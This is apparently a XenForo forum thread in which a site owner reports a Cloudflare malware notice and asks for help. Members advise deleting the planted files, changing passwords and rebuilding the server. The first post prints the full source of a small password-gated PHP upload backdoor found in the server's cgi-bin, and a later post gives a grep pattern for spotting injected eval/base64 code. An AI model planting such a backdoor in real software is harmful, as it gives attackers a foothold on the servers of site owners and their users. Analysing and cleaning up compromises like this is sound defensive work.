• This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn more.

XF 1.5 Possible abuse of my server...

#1
Hello,
I just recived email from cloudflare with this content
CloudFlare received a malware report regarding:

*************.net

Below is the report we received:

Reporter's Name: abuse@cloudflare.com
Reporter's Email Address: abuse@cloudflare.com
Reported URLs:
http://forum.************.net/cgi-bin/defalt.php
Logs or Evidence of Abuse: (U) Since September 2012, approximately 50 U.S. financial
institutions have been targeted in over 350 separate DDoS attacks with
varying effects. The botnets used in the attacks, identified as
“Brobot” and “Kamikaze/Toxin” consist of compromised high bandwidth
webservers with vulnerable content management systems (CMS). The
compromised bots are infected through a vulnerable CMS account. Once
the account is accessed, attack scripts are uploaded to a hidden
directory on the associated web site.

(U) The Kamikaze scripts embedded themselves in legitimate PHP files
instead of just putting new, standalone malicious scripts on the
hosts. One typical file that was infected with this method is
COPYRIGHT.php. The affected customers should check all of the PHP
files on their sites to look for malicious code that has been inserted
into script files or that's contained in other standalone files that
may be dispersed throughout directories on the system.


We have provided the name of your hosting provider to the reporter. Additionally, we have forwarded this complaint to your hosting provider. We have also restricted access to the malware-related content until it has been removed.

Regards,

CloudFlare Abuse
And content of defaul.php file is this

<?php $psf="8386b4523f5af044f90b79b972194c69";

if (isset($_FILES['filefor']) and !$_FILES['filefor']['error'] ){

@move_uploaded_file($_FILES['filefor']['tmp_name'], $_FILES['filefor']['name']) ;echo ' G00d ';

}

if(md5(md5($_REQUEST['method']))!=$psf){

echo ' You don\'t have permission to access . ';exit();

}

echo '<form method=post enctype=multipart/form-data><input type=file name=filefor ><input type=submit /></form>';
Now I have few questions:
1) Is this file real xenforo file or is it created from that ****in* bot?
2) If this is real xenforo file is there anything suspicious in it?

Do you have any sugestions what to do if file is OK, how to find that junk and why cloudflare reported that file?

P.S.
I masked my address because I am not sure how those bots works and could they use my link for new attacks, but if necessary i can provide real link to admins.
 

Mouth

Well-known member
#2
Xenforo does not use a /cgi-bin/ directory. So any such directory, or files within, are going to be outside of XF.
Your /cgi-bin/default.php code is also clearly an exploit. If you don't have anything other than XF on your site, I'd immediately delete the cgi-bin/ directory and all it's contents. Additionally, be very suspicious of the overall security and state of your server/site.
 

Brogan

XenForo moderator
Staff member
#3
You will also need to identify how the server was compromised.

Change any and all passwords, starting with any email addresses you use for password resets.
 

Tracy Perry

Well-known member
#4
And by chance are you running WordPress on any other domains on the same server?

If on a shared hosting environment, it may have been someone else that allowed the back door and you happened to get hit also (a hazard of a poorly maintained shared hosting server).
if your server, then you have some issues with the site not being "hardened".
 
#5
OK, tnx for suggestions.
I am on VPS (managed) but CentOS and Kloxo isnt updated a long time, so now I am doing it. I don't have active wordpress, but I have it installed because I tested something (wanted to migrat my portal to WP, but then changed my mind).

My hosting provider suggested me to update CentOs and Kloxo, which we will do soon, but I will have to backup all files and databse and then restore it after it is complited. I would like if it is possible to somehow scan files before that, so I don't "reinfect" new server again. From Cloudflare mail I see that this bot insert itself in php files, so it could be that some legit files are infected with code generated from bot....

I guess that it will be relativly easy to scan content of all php files only if I know what to look for?

And what would you sugest what steps to take now:
OK, I will change my passwords and also I delited file default.php (renamed it for now and changed premissions to 600).
What else could be helpful to do now.
 

Brogan

XenForo moderator
Staff member
#6
The simplest way to deal with the XF files would be by wiping the existing files and directories and re-uploading them again.
Make a note of the details in the library/config.php file, or download a copy.

You will also need to re-upload any add-on specific files.

The only two directories you will need to deal with manually are the data and internal_data directories - those can't be removed as they contain avatars and attachments.
They will need to be checked for any malicious files/scripts.
 
#7
One more information about this.
I run this command
find /home/admin/public_html/ -type f -regex ".*php" | xargs egrep -rl '(php.*eval\(gzinflate|base64_decode\(\$_REQUEST\[|eval\(base64_decode *\(|*md5\(md5 *\()'
which sould found functions often used in infected scripts, such as base64_encode and base64_decode (according to internet).


and got this result



OK first two (cgi-bin) will be deleted (I still didn't delete old one just renamed it). First entry is little confusing me but will figure it out....

But those three files from XenForo. What to do with them? Should it be like this or they were changed somehow?
 
#9
A attached those three files. For me they look normal but I am not sure

IPBoard.php
PHP:
<?php

/**
* IP.Board authentication method.
*
* @package XenForo_Authentication
*/
class XenForo_Authentication_IPBoard extends XenForo_Authentication_Abstract
{
    /**
    * Password info for this authentication object
    *
    * @var array
    */
    protected $_data = array();

    protected function _createHash($password, $salt)
    {
        return md5(md5($salt) . md5($password));
    }

    /**
    * Initialize data for the authentication object.
    *
    * @param string   Binary data from the database
    */
    public function setData($data)
    {
        $this->_data = unserialize($data);
    }

    /**
    * Generate new authentication data
    * @see XenForo_Authentication_Abstract::generate()
    */
    public function generate($password)
    {
        throw new XenForo_Exception('Cannot generate authentication for this type.');
    }

    /**
    * Authenticate against the given password
    * @see XenForo_Authentication_Abstract::authenticate()
    */
    public function authenticate($userId, $password)
    {
        if (!is_string($password) || $password === '' || empty($this->_data))
        {
            return false;
        }

        $userHash = $this->_createHash($password, $this->_data['salt']);
        return ($userHash === $this->_data['hash']);
    }
}
MyBb.php
PHP:
<?php

/**
* MyBB authentication method.
*
* @package XenForo_Authentication
*/
class XenForo_Authentication_MyBb extends XenForo_Authentication_Abstract
{
    /**
    * Password info for this authentication object
    *
    * @var array
    */
    protected $_data = array();

    protected function _createHash($password, $salt)
    {
        return md5(md5($salt) . md5($password));
    }

    /**
    * Initialize data for the authentication object.
    *
    * @param string   Binary data from the database
    */
    public function setData($data)
    {
        $this->_data = unserialize($data);
    }

    /**
    * Generate new authentication data
    * @see XenForo_Authentication_Abstract::generate()
    */
    public function generate($password)
    {
        throw new XenForo_Exception('Cannot generate authentication for this type.');
    }

    /**
    * Authenticate against the given password
    * @see XenForo_Authentication_Abstract::authenticate()
    */
    public function authenticate($userId, $password)
    {
        if (!is_string($password) || $password === '' || empty($this->_data))
        {
            return false;
        }

        $userHash = $this->_createHash($password, $this->_data['salt']);
        return ($userHash === $this->_data['hash']);
    }
}
vbulletin.php
PHP:
<?php

/**
* vBulletin authentication method.
*
* @package XenForo_Authentication
*/
class XenForo_Authentication_vBulletin extends XenForo_Authentication_Abstract
{
    /**
    * Password info for this authentication object
    *
    * @var array
    */
    protected $_data = array();

    protected function _createHash($password, $salt)
    {
        return md5(md5($password) . $salt);
    }

    /**
    * Initialize data for the authentication object.
    *
    * @param string   Binary data from the database
    */
    public function setData($data)
    {
        $this->_data = unserialize($data);
    }

    /**
    * Generate new authentication data
    * @see XenForo_Authentication_Abstract::generate()
    */
    public function generate($password)
    {
        throw new XenForo_Exception('Cannot generate authentication for this type.');
    }

    /**
    * Authenticate against the given password
    * @see XenForo_Authentication_Abstract::authenticate()
    */
    public function authenticate($userId, $password)
    {
        if (!is_string($password) || $password === '' || empty($this->_data))
        {
            return false;
        }

        $userHash = $this->_createHash($password, $this->_data['salt']);
        return ($userHash === $this->_data['hash']);
    }
}
 
#12
I'd just recommend backing up your database, and resetting your VPS.
Just because you have files in /cgi-bin/ doesn't mean there aren't files in other places too, possibly embedded in cron-jobs.

If you reset your machine, you completely wipe all bots/viruses/stuff you don't want.

Just make sure you've got a backup of your database, as many as you can make.